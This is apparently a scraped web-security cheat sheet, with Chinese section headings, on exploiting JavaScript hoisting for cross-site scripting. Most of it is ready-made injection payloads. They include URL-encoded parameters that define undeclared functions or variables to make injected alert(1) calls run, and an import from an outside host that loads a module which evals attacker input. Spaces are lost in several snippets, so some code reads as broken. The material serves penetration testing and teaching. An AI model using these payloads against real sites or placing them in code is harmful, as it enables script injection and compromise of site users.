// The function vulnerableFunction is not definedvulnerableFunction('test','<INJECTION>');// You can define it in your injection to execute JS//Payload1: param='-alert(1)-'')%3b+function+vulnerableFunction(a,b){return+1}%3b'-alert(1)-''); function vulnerableFunction(a,b){return 1};//Payload2: param=test')%3bfunction+vulnerableFunction(a,b){return+1}%3balert(1)test'); function vulnerableFunction(a,b){ return 1 };alert(1)
// If a variable is not defined, you could define it in the injection// In the following example var a is not definedfunctionmyFunction(a,b){return1};myFunction(a,'<INJECTION>')//Payload: param=test')%3b+var+a+%3d+1%3b+alert(1)%3btest'); var a = 1; alert(1);
// If an undeclared class is used, you cannot declare it AFTER being usedvar variable =newunexploitableClass();<INJECTION>// But you can actually declare it as a function, being able to fix the syntax with something like:function unexploitableClass() {return 1;}alert(1);
// Properties are not hoisted// So the following examples where the 'cookie' attribute doesn´t exist// cannot be fixed if you can only inject after that code:test.cookie('leo','INJECTION')test['cookie','injection']
更多场景
JavaScript Hoisting
JavaScript 变量提升
// Undeclared var accessing to an undeclared methodx.y(1,INJECTION)// You can injectalert(1));functionx(){}//// And execute the allert with (the alert is resolved before it's detected that the "y" is undefinedx.y(1,alert(1));functionx(){}//)
// Undeclared var accessing 2 nested undeclared methodx.y.z(1,INJECTION)// You can inject");import {x} from "https://example.com/module.js"//// It will be executedx.y.z("alert(1)");import {x} from"https://example.com/module.js"//")// The imported module:// module.jsvar x = {y: {z:function(param) {eval(param);}}};export { x };
// In this final scenario from https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/// It was injected the: let config;`-alert(1)`//`// With the goal of making in the block the var config be empty, so the return is not executed// And the same injection was replicated in the body URL to execute an alerttry {if(config){return;}// TODO handle missing config for: https://try-to-catch.glitch.me/"+`let config;`-alert(1)`//`+"} catch {fetch("/error", {method:"POST",body: {url:"https://try-to-catch.glitch.me/"+`let config;`-alert(1)-`//`+""}})}